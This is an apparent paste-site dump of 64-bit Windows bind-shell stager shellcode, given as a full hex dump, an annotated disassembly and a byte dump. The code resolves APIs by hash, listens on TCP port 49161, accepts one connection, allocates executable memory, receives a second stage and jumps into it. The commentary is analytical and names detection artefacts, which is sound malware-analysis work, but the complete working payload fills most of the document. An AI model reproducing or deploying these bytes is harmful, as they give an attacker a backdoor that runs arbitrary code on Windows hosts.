James_inthe_box

Dumped

Feb 2nd, 2018
  1. Hex dump: fc 48 81 e4 f0 ff ff ff e8 cc 00 00 00 41 51 41 50 52 51 56 48 31 d2 65 48 8b 52 60 48 8b 52 18 48 8b 52 20 48 8b 72 50 48 0f b7 4a 4a 4d 31 c9 48 31 c0 ac 3c 61 7c 02 2c 20 41 c1 c9 0d 41 01 c1 e2 ed 52 41 51 48 8b 52 20 8b 42 3c 48 01 d0 66 81 78 18 0b 02 0f 85 72 00 00 00 8b 80 88 00 00 00 48 85 c0 74 67 48 01 d0 50 8b 48 18 44 8b 40 20 49 01 d0 e3 56 48 ff c9 41 8b 34 88 48 01 d6 4d 31 c9 48 31 c0 ac 41 c1 c9 0d 41 01 c1 38 e0 75 f1 4c 03 4c 24 08 45 39 d1 75 d8 58 44 8b 40 24 49 01 d0 66 41 8b 0c 48 44 8b 40 1c 49 01 d0 41 8b 04 88 48 01 d0 41 58 41 58 5e 59 5a 41 58 41 59 41 5a 48 83 ec 20 41 52 ff e0 58 41 59 5a 48 8b 12 e9 4b ff ff ff 5d 49 be 77 73 32 5f 33 32 00 00 41 56 49 89 e6 48 81 ec a0 01 00 00 49 89 e5 48 31 c0 50 50 49 c7 c4 02 00 c0 09 41 54 49 89 e4 4c 89 f1 41 ba 4c 77 26 07 ff d5 4c 89 ea 68 01 01 00 00 59 41 ba 29 80 6b 00 ff d5 6a 02 59 50 50 4d 31 c9 4d 31 c0 48 ff c0 48 89 c2 41 ba ea 0f df e0 ff d5 48 89 c7 6a 10 41 58 4c 89 e2 48 89 f9 41 ba c2 db 37 67 ff d5 48 31 d2 48 89 f9 41 ba b7 e9 38 ff ff d5 4d 31 c0 48 31 d2 48 89 f9 41 ba 74 ec 3b e1 ff d5 48 89 f9 48 89 c7 41 ba 75 6e 4d 61 ff d5 48 81 c4 b0 02 00 00 48 83 ec 10 48 89 e2 4d 31 c9 6a 04 41 58 48 89 f9 41 ba 02 d9 c8 5f ff d5 48 83 c4 20 5e 6a 40 41 59 68 00 10 00 00 41 58 48 89 f2 48 31 c9 41 ba 58 a4 53 e5 ff d5 48 89 c3 49 89 c7 4d 31 c9 49 89 f0 48 89 da 48 89 f9 41 ba 02 d9 c8 5f ff d5 48 01 c3 48 29 c6 48 85 f6 75 e1 41 ff e7 58
  ; NOTE(review): these bytes are x86-64 code, but the listing was produced by a
  ; 32-bit decoder. Every stand-alone "inc"/"dec" line whose opcode byte is 0x4x
  ; is really a REX prefix belonging to the NEXT line, and registers printed as
  ; e?x are frequently 64-bit or r8-r15. Trailing comments give the 64-bit reading.
  ;
  ; Entry stub: clear the direction flag, align the stack to 16 bytes, then
  ; call 0xd9. The return address pushed by that call (0x0d) is the start of
  ; the API resolver; the code at 0xd9 pops it into rbp and later uses
  ; "call ebp" (call rbp) as its only way to reach Windows APIs.
  2. 0x00000000 fc cld
  3. 0x00000001 48 dec eax ; REX.W prefix for the next line, not an instruction
  4. 0x00000002 81e4f0ffffff and esp,0xfffffff0 ; 64-bit: and rsp, -16 (stack alignment)
  5. 0x00000008 e8cc000000 call 0x000000d9 ; pushes 0x0d, which 0xd9 pops into rbp
  ; API resolver (0x0d-0xd8), entered through "call ebp" (call rbp) from the
  ; code that follows 0xd9.
  ; NOTE(review): x86-64 bytes shown through a 32-bit decoder - each lone
  ; "inc"/"dec" line with a 0x4x byte is a REX prefix for the next line; the
  ; trailing comments give the 64-bit reading of the combined instruction.
  ;
  ; In:  r10d = 32-bit hash of the wanted export (loaded by the caller right
  ;      before each call); rcx/rdx/r8/r9 = arguments for that export.
  ; Does: walks the loaded-module list starting from gs:[0x60], hashes each
  ;      module name and each export name with a rotate-right-13/add loop, and
  ;      on a match jumps into the export with the argument registers restored.
  ; Structure offsets below match the documented x64 PEB / LDR / PE layouts.
  ;
  ; Defender note: the code carries no API name strings and no import table,
  ; so string- or import-based static detection sees nothing here; the fixed
  ; hash constants and the gs:[0x60] module walk are the stable artefacts.
  6. 0x0000000d 41 inc ecx
  7. 0x0000000e 51 push ecx ; 64-bit: push r9 (save caller's argument registers)
  8. 0x0000000f 41 inc ecx
  9. 0x00000010 50 push eax ; 64-bit: push r8
  10. 0x00000011 52 push edx ; push rdx
  11. 0x00000012 51 push ecx ; push rcx
  12. 0x00000013 56 push esi ; push rsi
  13. 0x00000014 48 dec eax
  14. 0x00000015 31d2 xor edx,edx ; 64-bit: xor rdx, rdx
  15. 0x00000017 6548 gs: dec eax
  16. 0x00000019 8b5260 mov edx,dword [edx + 96] ; 64-bit: mov rdx, gs:[rdx+0x60] (PEB)
  17. 0x0000001c 48 dec eax
  18. 0x0000001d 8b5218 mov edx,dword [edx + 24] ; 64-bit: mov rdx, [rdx+0x18] (PEB.Ldr)
  19. 0x00000020 48 dec eax
  20. 0x00000021 8b5220 mov edx,dword [edx + 32] ; 64-bit: mov rdx, [rdx+0x20] (first in-memory-order module entry)
  ; 0x24: top of the per-module loop (re-entered from 0xd4 with the next entry).
  21. 0x00000024 48 dec eax
  22. 0x00000025 8b7250 mov esi,dword [edx + 80] ; 64-bit: mov rsi, [rdx+0x50] (module name buffer, UTF-16)
  23. 0x00000028 48 dec eax
  24. 0x00000029 0fb74a4a movzx ecx,word [edx + 74] ; 64-bit: movzx rcx, word [rdx+0x4a] (name length field, used as byte count)
  25. 0x0000002d 4d dec ebp
  26. 0x0000002e 31c9 xor ecx,ecx ; 64-bit: xor r9, r9 (r9d accumulates the module-name hash; rcx is untouched)
  27. 0x00000030 48 dec eax
  28. 0x00000031 31c0 xor eax,eax ; 64-bit: xor rax, rax
  29. 0x00000033 ac lodsb
  30. 0x00000034 3c61 cmp al,97 ; 97 = 'a'
  31. 0x00000036 7c02 jl 0x0000003a
  32. 0x00000038 2c20 sub al,32 ; fold lower case to upper case so the hash is case-insensitive
  33. 0x0000003a 41 inc ecx
  34. 0x0000003b c1c90d ror ecx,13 ; 64-bit: ror r9d, 13
  35. 0x0000003e 41 inc ecx
  36. 0x0000003f 01c1 add ecx,eax ; 64-bit: add r9d, eax
  37. 0x00000041 e2ed loop 0x00000030 ; one iteration per byte of the name buffer
  38. 0x00000043 52 push edx ; push rdx (current module list entry)
  39. 0x00000044 41 inc ecx
  40. 0x00000045 51 push ecx ; 64-bit: push r9 (module hash, read back at 0x94 as [rsp+8])
  41. 0x00000046 48 dec eax
  42. 0x00000047 8b5220 mov edx,dword [edx + 32] ; 64-bit: mov rdx, [rdx+0x20] (module base address)
  43. 0x0000004a 8b423c mov eax,dword [edx + 60] ; mov eax, [rdx+0x3c] (e_lfanew)
  44. 0x0000004d 48 dec eax
  45. 0x0000004e 01d0 add eax,edx ; 64-bit: add rax, rdx (NT headers)
  46. 0x00000050 668178180b02 cmp word [eax + 24],523 ; 523 = 0x20b, optional-header magic of a PE32+ (64-bit) image
  47. 0x00000056 0f8572000000 jnz 0x000000ce ; not PE32+: skip to next module
  48. 0x0000005c 8b8088000000 mov eax,dword [eax + 136] ; mov eax, [rax+0x88] (export directory RVA)
  49. 0x00000062 48 dec eax
  50. 0x00000063 85c0 test eax,eax ; 64-bit: test rax, rax
  51. 0x00000065 7467 jz 0x000000ce ; module has no exports: next module
  52. 0x00000067 48 dec eax
  53. 0x00000068 01d0 add eax,edx ; 64-bit: add rax, rdx (export directory address)
  54. 0x0000006a 50 push eax ; push rax (export directory, popped at 0x9d or 0xcd)
  55. 0x0000006b 8b4818 mov ecx,dword [eax + 24] ; mov ecx, [rax+0x18] (NumberOfNames)
  56. 0x0000006e 44 inc esp
  57. 0x0000006f 8b4020 mov eax,dword [eax + 32] ; 64-bit: mov r8d, [rax+0x20] (AddressOfNames RVA); rsp is untouched
  58. 0x00000072 49 dec ecx
  59. 0x00000073 01d0 add eax,edx ; 64-bit: add r8, rdx
  ; 0x75: top of the per-export loop.
  60. 0x00000075 e356 jecxz 0x000000cd ; 64-bit: jrcxz - all names tried, move to next module
  61. 0x00000077 48 dec eax
  62. 0x00000078 ffc9 dec ecx ; 64-bit: dec rcx (names are walked from last to first)
  63. 0x0000007a 41 inc ecx
  64. 0x0000007b 8b3488 mov esi,dword [eax + ecx * 4] ; 64-bit: mov esi, [r8+rcx*4] (name RVA)
  65. 0x0000007e 48 dec eax
  66. 0x0000007f 01d6 add esi,edx ; 64-bit: add rsi, rdx (pointer to ASCII export name)
  67. 0x00000081 4d dec ebp
  68. 0x00000082 31c9 xor ecx,ecx ; 64-bit: xor r9, r9 (export-name hash accumulator)
  69. 0x00000084 48 dec eax
  70. 0x00000085 31c0 xor eax,eax ; 64-bit: xor rax, rax
  71. 0x00000087 ac lodsb
  72. 0x00000088 41 inc ecx
  73. 0x00000089 c1c90d ror ecx,13 ; 64-bit: ror r9d, 13
  74. 0x0000008c 41 inc ecx
  75. 0x0000008d 01c1 add ecx,eax ; 64-bit: add r9d, eax
  76. 0x0000008f 38e0 cmp al,ah ; ah is 0 here, so the loop ends after the NUL terminator is hashed
  77. 0x00000091 75f1 jnz 0x00000084
  78. 0x00000093 4c dec esp
  79. 0x00000094 034c2408 add ecx,dword [esp + 8] ; 64-bit: add r9, [rsp+8] (add the module-name hash)
  80. 0x00000098 45 inc ebp
  81. 0x00000099 39d1 cmp ecx,edx ; 64-bit: cmp r9d, r10d (combined hash vs. requested hash)
  82. 0x0000009b 75d8 jnz 0x00000075
  ; Match: translate name index -> ordinal -> function address.
  83. 0x0000009d 58 pop eax ; pop rax (export directory)
  84. 0x0000009e 44 inc esp
  85. 0x0000009f 8b4024 mov eax,dword [eax + 36] ; 64-bit: mov r8d, [rax+0x24] (AddressOfNameOrdinals RVA)
  86. 0x000000a2 49 dec ecx
  87. 0x000000a3 01d0 add eax,edx ; 64-bit: add r8, rdx
  88. 0x000000a5 6641 inc ecx
  89. 0x000000a7 8b0c48 mov ecx,dword [eax + ecx * 2] ; 64-bit: mov cx, [r8+rcx*2] (ordinal of the matched name)
  90. 0x000000aa 44 inc esp
  91. 0x000000ab 8b401c mov eax,dword [eax + 28] ; 64-bit: mov r8d, [rax+0x1c] (AddressOfFunctions RVA)
  92. 0x000000ae 49 dec ecx
  93. 0x000000af 01d0 add eax,edx ; 64-bit: add r8, rdx
  94. 0x000000b1 41 inc ecx
  95. 0x000000b2 8b0488 mov eax,dword [eax + ecx * 4] ; 64-bit: mov eax, [r8+rcx*4] (function RVA)
  96. 0x000000b5 48 dec eax
  97. 0x000000b6 01d0 add eax,edx ; 64-bit: add rax, rdx (resolved function address)
  98. 0x000000b8 41 inc ecx
  99. 0x000000b9 58 pop eax ; 64-bit: pop r8 (discard saved module hash)
  100. 0x000000ba 41 inc ecx
  101. 0x000000bb 58 pop eax ; 64-bit: pop r8 (discard saved list entry)
  102. 0x000000bc 5e pop esi ; pop rsi (restore caller's registers from here on)
  103. 0x000000bd 59 pop ecx ; pop rcx
  104. 0x000000be 5a pop edx ; pop rdx
  105. 0x000000bf 41 inc ecx
  106. 0x000000c0 58 pop eax ; 64-bit: pop r8
  107. 0x000000c1 41 inc ecx
  108. 0x000000c2 59 pop ecx ; 64-bit: pop r9
  109. 0x000000c3 41 inc ecx
  110. 0x000000c4 5a pop edx ; 64-bit: pop r10 (caller's return address)
  111. 0x000000c5 48 dec eax
  112. 0x000000c6 83ec20 sub esp,32 ; 64-bit: sub rsp, 32 (shadow space for the API; never released here)
  113. 0x000000c9 41 inc ecx
  114. 0x000000ca 52 push edx ; 64-bit: push r10 (return address back on top of the stack)
  115. 0x000000cb ffe0 jmp eax ; jmp rax - tail-jump into the resolved API, which returns to the caller
  ; 0xcd / 0xce: no match in this module - unwind and follow the list link.
  116. 0x000000cd 58 pop eax ; pop rax (drop export directory pointer)
  117. 0x000000ce 41 inc ecx
  118. 0x000000cf 59 pop ecx ; 64-bit: pop r9 (drop module hash)
  119. 0x000000d0 5a pop edx ; pop rdx (current list entry)
  120. 0x000000d1 48 dec eax
  121. 0x000000d2 8b12 mov edx,dword [edx] ; 64-bit: mov rdx, [rdx] (next module entry)
  122. 0x000000d4 e94bffffff jmp 0x00000024
  ; Main body, part 1 (0xd9-0x11f): keep the resolver address in rbp, build the
  ; "ws2_32" string and a socket address on the stack, load the library and
  ; start Winsock.
  ; NOTE(review): x86-64 bytes shown through a 32-bit decoder - each lone
  ; "inc"/"dec" line with a 0x4x byte is a REX prefix for the next line. Every
  ; "inc ecx / mov edx,<imm32>" pair before a "call ebp" is really
  ; "mov r10d, <hash>", the selector consumed by the resolver at 0x0d.
  ; None of the API return values in this part are tested.
  123. 0x000000d9 5d pop ebp ; pop rbp = return address pushed at 0x08 = resolver at 0x0d
  ; 0xda-0xe3 is ONE 10-byte instruction (49 be + 8 immediate bytes):
  ; mov r14, imm64 whose bytes spell "ws2_32" followed by two NULs (also
  ; readable in the byte dump). The "mov esi / xor esi / add byte" lines below
  ; are an artefact of the 32-bit decode and never execute as shown.
  124. 0x000000da 49 dec ecx
  125. 0x000000db be7773325f mov esi,0x5f327377--> '_2sw'
  126. 0x000000e0 3332 xor esi,dword [edx]
  127. 0x000000e2 0000 add byte [eax],al
  128. 0x000000e4 41 inc ecx
  129. 0x000000e5 56 push esi ; 64-bit: push r14 (string onto the stack)
  130. 0x000000e6 49 dec ecx
  131. 0x000000e7 89e6 mov esi,esp ; 64-bit: mov r14, rsp (r14 -> "ws2_32")
  132. 0x000000e9 48 dec eax
  133. 0x000000ea 81eca0010000 sub esp,416 ; 64-bit: sub rsp, 0x1a0 (scratch area)
  134. 0x000000f0 49 dec ecx
  135. 0x000000f1 89e5 mov ebp,esp ; 64-bit: mov r13, rsp (scratch pointer; rbp is NOT modified)
  136. 0x000000f3 48 dec eax
  137. 0x000000f4 31c0 xor eax,eax ; 64-bit: xor rax, rax
  138. 0x000000f6 50 push eax ; push rax (zero)
  139. 0x000000f7 50 push eax ; push rax (zero)
  140. 0x000000f8 49 dec ecx
  141. 0x000000f9 c7c40200c009 mov esp,0x09c00002 ; 64-bit: mov r12, 0x09c00002 - the stack pointer is NOT changed
  ; In memory the immediate is 02 00 c0 09: address family 2 (AF_INET) followed
  ; by port bytes c0 09, i.e. TCP port 0xc009 = 49161 in network byte order.
  ; With the zero qword pushed above it, the address field is all zeroes
  ; (any local interface).
  142. 0x000000ff 41 inc ecx
  143. 0x00000100 54 push esp ; 64-bit: push r12
  144. 0x00000101 49 dec ecx
  145. 0x00000102 89e4 mov esp,esp ; 64-bit: mov r12, rsp (r12 -> socket address, used by bind at 0x14c)
  146. 0x00000104 4c dec esp
  147. 0x00000105 89f1 mov ecx,esi ; 64-bit: mov rcx, r14 (arg 1 = "ws2_32")
  148. 0x00000107 41 inc ecx
  149. 0x00000108 ba4c772607 mov edx,0x0726774c--> '&wL'
  150. 0x0000010d ffd5 call ebp --> kernel32.dll!LoadLibraryA
  151. 0x0000010f 4c dec esp
  152. 0x00000110 89ea mov edx,ebp ; 64-bit: mov rdx, r13 (arg 2 = scratch buffer for the WSADATA output)
  153. 0x00000112 6801010000 push 257 ; 257 = 0x0101
  154. 0x00000117 59 pop ecx ; pop rcx: arg 1 = requested Winsock version 1.1
  155. 0x00000118 41 inc ecx
  156. 0x00000119 ba29806b00 mov edx,0x006b8029--> 'k)'
  157. 0x0000011e ffd5 call ebp --> ws2_32.dll!WSAStartup
  ; Main body, part 2 (0x120-0x17a): create a TCP socket, bind it to the
  ; address built at 0xf6-0x102, listen, accept one connection, then close the
  ; listening socket and keep only the accepted one in rdi.
  ; NOTE(review): x86-64 bytes shown through a 32-bit decoder - each lone
  ; "inc"/"dec" line with a 0x4x byte is a REX prefix for the next line, and
  ; each "inc ecx / mov edx,<imm32>" pair before "call ebp" is
  ; "mov r10d, <hash>" for the resolver at 0x0d.
  ; No return value is checked anywhere in this part.
  ; Defender note: the observable behaviour is a process that opens a
  ; listening TCP socket, accepts a single inbound connection and immediately
  ; stops listening.
  158. 0x00000120 6a02 push 2
  159. 0x00000122 59 pop ecx ; pop rcx: arg 1 (af) = 2
  160. 0x00000123 50 push eax ; push rax - stack argument; rax is WSAStartup's return value (0 on success)
  161. 0x00000124 50 push eax ; push rax - second stack argument
  162. 0x00000125 4d dec ebp
  163. 0x00000126 31c9 xor ecx,ecx ; 64-bit: xor r9, r9 (arg 4 = 0); rcx keeps the value 2
  164. 0x00000128 4d dec ebp
  165. 0x00000129 31c0 xor eax,eax ; 64-bit: xor r8, r8 (arg 3 = 0); rax is untouched
  166. 0x0000012b 48 dec eax
  167. 0x0000012c ffc0 inc eax ; 64-bit: inc rax
  168. 0x0000012e 48 dec eax
  169. 0x0000012f 89c2 mov edx,eax ; 64-bit: mov rdx, rax (arg 2 = type; 1 = stream if WSAStartup returned 0)
  170. 0x00000131 41 inc ecx
  171. 0x00000132 baea0fdfe0 mov edx,0xe0df0fea ; 64-bit: mov r10d, hash (rdx keeps the type value)
  172. 0x00000137 ffd5 call ebp --> ws2_32.dll!WSASocketA
  173. 0x00000139 48 dec eax
  174. 0x0000013a 89c7 mov edi,eax ; 64-bit: mov rdi, rax (listening socket handle)
  175. 0x0000013c 6a10 push 16
  176. 0x0000013e 41 inc ecx
  177. 0x0000013f 58 pop eax ; 64-bit: pop r8 (arg 3 = address length 16)
  178. 0x00000140 4c dec esp
  179. 0x00000141 89e2 mov edx,esp ; 64-bit: mov rdx, r12 (arg 2 = socket address built at 0xf6-0x102)
  180. 0x00000143 48 dec eax
  181. 0x00000144 89f9 mov ecx,edi ; 64-bit: mov rcx, rdi (arg 1 = socket)
  182. 0x00000146 41 inc ecx
  183. 0x00000147 bac2db3767 mov edx,0x6737dbc2--> 'g7'
  184. 0x0000014c ffd5 call ebp --> ws2_32.dll!bind
  185. 0x0000014e 48 dec eax
  186. 0x0000014f 31d2 xor edx,edx ; 64-bit: xor rdx, rdx (arg 2 = backlog 0)
  187. 0x00000151 48 dec eax
  188. 0x00000152 89f9 mov ecx,edi ; 64-bit: mov rcx, rdi
  189. 0x00000154 41 inc ecx
  190. 0x00000155 bab7e938ff mov edx,0xff38e9b7 ; 64-bit: mov r10d, hash
  191. 0x0000015a ffd5 call ebp --> ws2_32.dll!listen
  192. 0x0000015c 4d dec ebp
  193. 0x0000015d 31c0 xor eax,eax ; 64-bit: xor r8, r8 (arg 3 = NULL)
  194. 0x0000015f 48 dec eax
  195. 0x00000160 31d2 xor edx,edx ; 64-bit: xor rdx, rdx (arg 2 = NULL, peer address not requested)
  196. 0x00000162 48 dec eax
  197. 0x00000163 89f9 mov ecx,edi ; 64-bit: mov rcx, rdi
  198. 0x00000165 41 inc ecx
  199. 0x00000166 ba74ec3be1 mov edx,0xe13bec74--> ';t'
  200. 0x0000016b ffd5 call ebp --> ws2_32.dll!accept
  201. 0x0000016d 48 dec eax
  202. 0x0000016e 89f9 mov ecx,edi ; 64-bit: mov rcx, rdi (arg 1 = listening socket, about to be closed)
  203. 0x00000170 48 dec eax
  204. 0x00000171 89c7 mov edi,eax ; 64-bit: mov rdi, rax (rdi now holds the accepted connection)
  205. 0x00000173 41 inc ecx
  206. 0x00000174 ba756e4d61 mov edx,0x614d6e75--> 'aMnu'
  207. 0x00000179 ffd5 call ebp --> ws2_32.dll!closesocket
  ; Main body, part 3 (0x17b-0x1e1): read a 4-byte length from the accepted
  ; connection, allocate that many bytes, fill the allocation from the socket
  ; and jump to it.
  ; NOTE(review): x86-64 bytes shown through a 32-bit decoder - each lone
  ; "inc"/"dec" line with a 0x4x byte is a REX prefix for the next line, and
  ; each "inc ecx / mov edx,<imm32>" pair before "call ebp" is
  ; "mov r10d, <hash>" for the resolver at 0x0d.
  ; Defender notes, all visible in the bytes below:
  ;  - the allocation size comes straight from the peer and is never bounded;
  ;  - the allocation is requested with protection 0x40, i.e. readable,
  ;    writable and executable at once;
  ;  - recv's return value is added/subtracted without an error check;
  ;  - the final jmp runs whatever the peer sent, and this code writes
  ;    nothing to disk, so the follow-on code exists only in memory.
  208. 0x0000017b 48 dec eax
  209. 0x0000017c 81c4b0020000 add esp,688 ; 64-bit: add rsp, 0x2b0 (release stack used so far)
  210. 0x00000182 48 dec eax
  211. 0x00000183 83ec10 sub esp,16 ; 64-bit: sub rsp, 16
  212. 0x00000186 48 dec eax
  213. 0x00000187 89e2 mov edx,esp ; 64-bit: mov rdx, rsp (arg 2 = buffer for the length field)
  214. 0x00000189 4d dec ebp
  215. 0x0000018a 31c9 xor ecx,ecx ; 64-bit: xor r9, r9 (arg 4 = flags 0)
  216. 0x0000018c 6a04 push 4
  217. 0x0000018e 41 inc ecx
  218. 0x0000018f 58 pop eax ; 64-bit: pop r8 (arg 3 = read 4 bytes)
  219. 0x00000190 48 dec eax
  220. 0x00000191 89f9 mov ecx,edi ; 64-bit: mov rcx, rdi (arg 1 = accepted socket)
  221. 0x00000193 41 inc ecx
  222. 0x00000194 ba02d9c85f mov edx,0x5fc8d902 ; 64-bit: mov r10d, hash (rdx still points at the buffer)
  223. 0x00000199 ffd5 call ebp --> ws2_32.dll!recv
  224. 0x0000019b 48 dec eax
  225. 0x0000019c 83c420 add esp,32 ; 64-bit: add rsp, 32 (drop the shadow space the resolver left at 0xc6)
  226. 0x0000019f 5e pop esi ; pop rsi = the value just received = size of the next stage
  227. 0x000001a0 6a40 push 64
  228. 0x000001a2 41 inc ecx
  229. 0x000001a3 59 pop ecx ; 64-bit: pop r9 (arg 4 = 0x40, PAGE_EXECUTE_READWRITE)
  230. 0x000001a4 6800100000 push 4096
  231. 0x000001a9 41 inc ecx
  232. 0x000001aa 58 pop eax ; 64-bit: pop r8 (arg 3 = 0x1000, MEM_COMMIT)
  233. 0x000001ab 48 dec eax
  234. 0x000001ac 89f2 mov edx,esi ; 64-bit: mov rdx, rsi (arg 2 = size, taken unchecked from the network)
  235. 0x000001ae 48 dec eax
  236. 0x000001af 31c9 xor ecx,ecx ; 64-bit: xor rcx, rcx (arg 1 = NULL, let the system pick the address)
  237. 0x000001b1 41 inc ecx
  238. 0x000001b2 ba58a453e5 mov edx,0xe553a458--> 'SX'
  239. 0x000001b7 ffd5 call ebp --> kernel32.dll!VirtualAlloc
  240. 0x000001b9 48 dec eax
  241. 0x000001ba 89c3 mov ebx,eax ; 64-bit: mov rbx, rax (write cursor)
  242. 0x000001bc 49 dec ecx
  243. 0x000001bd 89c7 mov edi,eax ; 64-bit: mov r15, rax (start of buffer; rdi still holds the socket)
  ; 0x1bf: receive loop - rbx = next write position, rsi = bytes still expected.
  244. 0x000001bf 4d dec ebp
  245. 0x000001c0 31c9 xor ecx,ecx ; 64-bit: xor r9, r9 (flags 0)
  246. 0x000001c2 49 dec ecx
  247. 0x000001c3 89f0 mov eax,esi ; 64-bit: mov r8, rsi (arg 3 = bytes remaining)
  248. 0x000001c5 48 dec eax
  249. 0x000001c6 89da mov edx,ebx ; 64-bit: mov rdx, rbx (arg 2 = write cursor)
  250. 0x000001c8 48 dec eax
  251. 0x000001c9 89f9 mov ecx,edi ; 64-bit: mov rcx, rdi (arg 1 = accepted socket)
  252. 0x000001cb 41 inc ecx
  253. 0x000001cc ba02d9c85f mov edx,0x5fc8d902 ; 64-bit: mov r10d, hash
  254. 0x000001d1 ffd5 call ebp --> ws2_32.dll!recv
  255. 0x000001d3 48 dec eax
  256. 0x000001d4 01c3 add ebx,eax ; 64-bit: add rbx, rax (advance by bytes received)
  257. 0x000001d6 48 dec eax
  258. 0x000001d7 29c6 sub esi,eax ; 64-bit: sub rsi, rax
  259. 0x000001d9 48 dec eax
  260. 0x000001da 85f6 test esi,esi ; 64-bit: test rsi, rsi
  261. 0x000001dc 75e1 jnz 0x000001bf ; loop until the announced length has arrived
  262. 0x000001de 41 inc ecx
  263. 0x000001df ffe7 jmp edi ; 64-bit: jmp r15 - control passes to the received bytes
  264. 0x000001e1 58 pop eax ; trailing byte after an unconditional jmp; no branch in this listing targets it
  265.  
  266. Byte Dump:
  267. .H...........AQAPRQVH1.eH.R`H.R.H.RH.rPH..JJM1.H1..<a|.,A..A....RAQH.R.B<H..f.x....r.........H..tgH..P.H.D.@I...VH..A.4.H..M1.H1..A..A..8.u.L.L$.E9.u.XD.@$I..fA.HD.@.I..A...H..AXAX^YZAXAYAZH..AR..XAYZH...K...]I.ws2_32..AVI..H......I..H1.PPI.....ATI..L..A.Lw&...L..h....YA.).k...j.YPPM1.M1.H..H..A.......H..j.AXL..H..A...7g..H1.H..A...8...M1.H1.H..A.t.;...H..H..A.unMa..H......H...H..M1.j.AXH..A...._..H..^j@AYh....AXH..H1.A.X.S...H..I..M1.I..H..H..A...._..H..H).H..u.A..X